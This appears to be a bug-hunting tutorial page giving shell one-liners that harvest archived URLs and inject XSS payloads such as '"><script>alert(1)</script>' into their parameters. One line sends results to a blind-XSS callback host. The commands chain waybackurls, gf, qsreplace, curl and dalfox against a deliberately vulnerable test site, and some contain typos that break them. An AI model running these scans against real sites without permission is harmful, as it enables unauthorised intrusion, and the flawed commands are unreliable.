Automated XSS

Make sure you have Go installed on your Machine

To Install Go on your Machine:

  1) sudo apt install -y golang
  2) export GOROOT=/usr/lib/go
  3) export GOPATH=$HOME/go
  4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
  5) source .bashrc

How to Hunt Blind XSS using Dalfox?

  • Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.

  • Use GF patterns to find Possible XSS Vulnerable Parameters.

  • Use Dalfox to find XSS.

  • Steps :

waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt

How to Hunt Reflected XSS?

  • Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.

  • Use qsreplace for Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path.

  • Steps :

waybackurls testphp.vulnweb.com| grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

Find the parameters which are not filtering special characters - One Liner

echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackruls | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host  \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt

Find Script here : QuickXSS

If you have any Questions, Reach out to me via Twitter

Twitter : Fani Malik

Twitter : Faizee Asad

Twitter : Prince Prafull

Last updated